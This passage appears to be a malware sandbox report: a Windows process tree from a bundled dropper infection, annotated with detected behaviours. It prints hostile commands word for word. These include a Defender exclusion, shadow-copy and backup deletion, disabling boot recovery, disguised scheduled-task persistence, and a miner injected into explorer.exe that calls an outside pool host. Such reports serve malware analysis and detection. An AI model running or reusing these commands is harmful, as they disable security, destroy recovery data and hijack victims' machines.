C:\Users\Admin\Documents\hokD3PTLQSSwTOQbjs46iQbu.exeC:\Users\Admin\Documents\hokD3PTLQSSwTOQbjs46iQbu.exe7⤵PID:7836
-
-
-
C:\Users\Admin\Documents\LMWBld729vM0NLcjGUIXs50T.exe"C:\Users\Admin\Documents\LMWBld729vM0NLcjGUIXs50T.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1796
-
-
C:\Users\Admin\Documents\X8ggw6QAmUZo5h6DtPyzpOme.exe"C:\Users\Admin\Documents\X8ggw6QAmUZo5h6DtPyzpOme.exe"6⤵PID:8052
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\X8GGW6~1.DLL,s C:\Users\Admin\DOCUME~1\X8GGW6~1.EXE7⤵
- Loads dropped DLL
PID:9168 -
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\X8GGW6~1.DLL,QzESOFhQcQ==8⤵
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
PID:8848 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\X8GGW6~1.DLL9⤵PID:10080
-
-
-
-
-
C:\Users\Admin\Documents\Lx1ZUHXJ3OrL_roz81lD9EQ3.exe"C:\Users\Admin\Documents\Lx1ZUHXJ3OrL_roz81lD9EQ3.exe"6⤵PID:5132
-
C:\Users\Admin\AppData\Local\Temp\is-OLGIO.tmp\Lx1ZUHXJ3OrL_roz81lD9EQ3.tmp"C:\Users\Admin\AppData\Local\Temp\is-OLGIO.tmp\Lx1ZUHXJ3OrL_roz81lD9EQ3.tmp" /SL5="$703C6,138429,56832,C:\Users\Admin\Documents\Lx1ZUHXJ3OrL_roz81lD9EQ3.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:572 -
C:\Users\Admin\AppData\Local\Temp\is-2B6LC.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-2B6LC.tmp\Setup.exe" /Verysilent8⤵PID:6188
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:8760 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629586615 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵PID:10524
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵
- Executes dropped EXE
PID:5584 -
C:\Users\Admin\AppData\Local\Temp\is-MGVT8.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-MGVT8.tmp\MediaBurner2.tmp" /SL5="$202F8,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6136 -
C:\Users\Admin\AppData\Local\Temp\is-41OH3.tmp\ultradumnibour.exe"C:\Users\Admin\AppData\Local\Temp\is-41OH3.tmp\ultradumnibour.exe" /S /UID=burnerch27⤵PID:6756
-
C:\Program Files\Windows NT\YYXHAJQRGW\ultramediaburner.exe"C:\Program Files\Windows NT\YYXHAJQRGW\ultramediaburner.exe" /VERYSILENT8⤵PID:7532
-
C:\Users\Admin\AppData\Local\Temp\is-474KC.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-474KC.tmp\ultramediaburner.tmp" /SL5="$30488,281924,62464,C:\Program Files\Windows NT\YYXHAJQRGW\ultramediaburner.exe" /VERYSILENT9⤵
- Suspicious use of FindShellTrayWindow
PID:5536 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:6788
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\44-540a5-b08-6d88b-e70a65d1699db\Fapitecale.exe"C:\Users\Admin\AppData\Local\Temp\44-540a5-b08-6d88b-e70a65d1699db\Fapitecale.exe"8⤵PID:8216
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 13329⤵PID:2936
-
-
-
C:\Users\Admin\AppData\Local\Temp\c1-96b00-493-89d99-a753e0728eafd\Taexaeshocife.exe"C:\Users\Admin\AppData\Local\Temp\c1-96b00-493-89d99-a753e0728eafd\Taexaeshocife.exe"8⤵
- Modifies system certificate store
PID:8272 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\boblvgda.eed\GcleanerEU.exe /eufive & exit9⤵PID:6480
-
C:\Users\Admin\AppData\Local\Temp\boblvgda.eed\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\boblvgda.eed\GcleanerEU.exe /eufive10⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2204 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\boblvgda.eed\GcleanerEU.exe" & exit11⤵PID:6728
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:5388
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
PID:8796
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g34cvqlw.nw5\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:7616
-
C:\Users\Admin\AppData\Local\Temp\g34cvqlw.nw5\installer.exeC:\Users\Admin\AppData\Local\Temp\g34cvqlw.nw5\installer.exe /qn CAMPAIGN="654"10⤵PID:6820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2k5rkvin.uyu\anyname.exe & exit9⤵PID:5388
-
C:\Users\Admin\AppData\Local\Temp\2k5rkvin.uyu\anyname.exeC:\Users\Admin\AppData\Local\Temp\2k5rkvin.uyu\anyname.exe10⤵PID:2068
-
C:\Users\Admin\AppData\Local\Temp\2k5rkvin.uyu\anyname.exe"C:\Users\Admin\AppData\Local\Temp\2k5rkvin.uyu\anyname.exe" -q11⤵PID:5784
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ebuyvi1x.w3p\gcleaner.exe /mixfive & exit9⤵PID:5572
-
C:\Users\Admin\AppData\Local\Temp\ebuyvi1x.w3p\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ebuyvi1x.w3p\gcleaner.exe /mixfive10⤵PID:7560
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ebuyvi1x.w3p\gcleaner.exe" & exit11⤵PID:9824
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
PID:9780
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\231j001y.1mu\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
PID:10000
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵
- Executes dropped EXE
PID:5436 -
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵
- Executes dropped EXE
PID:6324
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵
- Executes dropped EXE
PID:4116
-
-
-
-
-
C:\Users\Admin\Documents\9uYgZkgS3XwN7z_tehB60XIr.exe"C:\Users\Admin\Documents\9uYgZkgS3XwN7z_tehB60XIr.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Users\Admin\Documents\1AKUBdPthFtxYU_pWBTh89Pm.exe"C:\Users\Admin\Documents\1AKUBdPthFtxYU_pWBTh89Pm.exe"2⤵
- Executes dropped EXE
PID:2460 -
C:\Users\Admin\Documents\1AKUBdPthFtxYU_pWBTh89Pm.exe"C:\Users\Admin\Documents\1AKUBdPthFtxYU_pWBTh89Pm.exe" -q3⤵
- Executes dropped EXE
PID:4948
-
-
-
C:\Users\Admin\Documents\R7_uP7PjfaAYreXfglrgrLLX.exe"C:\Users\Admin\Documents\R7_uP7PjfaAYreXfglrgrLLX.exe"2⤵
- Executes dropped EXE
PID:2304 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 3883⤵
- Program crash
PID:3144
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 3683⤵
- Program crash
PID:4768
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 3523⤵
- Program crash
PID:3400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 6243⤵
- Program crash
PID:5244
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 6603⤵
- Program crash
PID:5980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 6963⤵
- Program crash
PID:4932
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 6363⤵
- Program crash
PID:4460
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 7523⤵
- Program crash
PID:5644
-
-
-
C:\Users\Admin\Documents\llVVu0HlsK1Kw5wuGRgoKpD7.exe"C:\Users\Admin\Documents\llVVu0HlsK1Kw5wuGRgoKpD7.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3260
-
-
C:\Users\Admin\AppData\Local\Temp\is-OMA5K.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-OMA5K.tmp\VPN.tmp" /SL5="$103A4,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5624 -
C:\Users\Admin\AppData\Local\Temp\is-ELABG.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-ELABG.tmp\Setup.exe" /silent /subid=7202⤵PID:7920
-
C:\Users\Admin\AppData\Local\Temp\is-JHMSA.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-JHMSA.tmp\Setup.tmp" /SL5="$802DA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-ELABG.tmp\Setup.exe" /silent /subid=7203⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:6348 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "4⤵PID:9184
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09015⤵
- Checks SCSI registry key(s)
PID:6156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "4⤵PID:7488
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09015⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:1160
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1256
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:10052
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:312 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5592
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
PID:6128
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:1888 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EF96011E6E05ADC9F83E52AB605A6545 C2⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5556
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3D1154B6896FB74A258700951AFDC573 C2⤵
- Loads dropped DLL
PID:7408
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding FD716386239C6AD11FC8C96CDB624F23 C2⤵
- Loads dropped DLL
PID:8884
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2B5E2727CC7D906C7AF0B7A991F1F50C2⤵
- Loads dropped DLL
PID:9632
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
PID:10968 -
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default3⤵
- Adds Run key to start application
PID:10624 -
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--M3yPGhgtKO"4⤵PID:10412
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_EAB4.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"3⤵PID:10648
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5592
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7112 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1040
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:9056 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:7916
-
-
C:\Users\Admin\AppData\Local\Temp\D6BC.exeC:\Users\Admin\AppData\Local\Temp\D6BC.exe1⤵PID:6960
-
C:\Users\Admin\AppData\Local\Temp\F6F7.exeC:\Users\Admin\AppData\Local\Temp\F6F7.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:9892
-
C:\Users\Admin\AppData\Local\Temp\BC.exeC:\Users\Admin\AppData\Local\Temp\BC.exe1⤵
- Adds Run key to start application
PID:10040 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe" -start2⤵
- Enumerates connected drives
PID:9876 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe" -agent 03⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Drops file in Windows directory
PID:7044
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat3⤵PID:8144
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:8520
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵PID:4124
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:9244
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵PID:8164
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵PID:9124
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵PID:5636
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Loads dropped DLL
PID:7916
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵PID:1644
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:9348
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵PID:10596
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe2⤵PID:10076
-
-
C:\Users\Admin\AppData\Local\Temp\1EE4.exeC:\Users\Admin\AppData\Local\Temp\1EE4.exe1⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6960 -
C:\Users\Admin\Documents\Update.exe"C:\Users\Admin\Documents\Update.exe"2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:9472 -
C:\Users\Admin\AppData\Local\Temp\Red1_.exe"C:\Users\Admin\AppData\Local\Temp\Red1_.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:9976
-
-
C:\Users\Admin\AppData\Local\Temp\Clip_.exe"C:\Users\Admin\AppData\Local\Temp\Clip_.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
PID:5640
-
-
C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"3⤵PID:10108
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit4⤵PID:6796
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'5⤵
- Creates scheduled task(s)
PID:1344
-
-
-
C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"4⤵
- Suspicious use of SetThreadContext
PID:8556 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit5⤵PID:5036
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'6⤵
- Creates scheduled task(s)
PID:9116
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵PID:10216
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth5⤵PID:6608
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"3⤵PID:9516
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit4⤵PID:6520
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'5⤵
- Creates scheduled task(s)
PID:7832
-
-
-
C:\Users\Admin\AppData\Roaming\VideoDriver.exe"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"4⤵PID:9944
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit5⤵PID:4284
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'6⤵
- Creates scheduled task(s)
PID:1992
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"5⤵PID:2804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"3⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
PID:8512
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\1EE4.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\1EE4.exe"2⤵PID:6112
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 1003⤵
- Runs ping.exe
PID:9184
-
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 9003⤵
- Runs ping.exe
PID:9264
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8360
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:8560
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9988
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:4312
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9416
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:10200
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7152
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:9312
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9480
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:10088
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:9720 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:9812
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:9776 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{29cc6737-787d-6c43-9cf2-f96bf3ffb708}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:8708
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:6908
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:2068
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:7388
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵PID:4236
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:9836
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:7016
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:6084 -
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Suspicious use of SetWindowsHookEx
PID:10956
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4184
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5780
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:10552
-
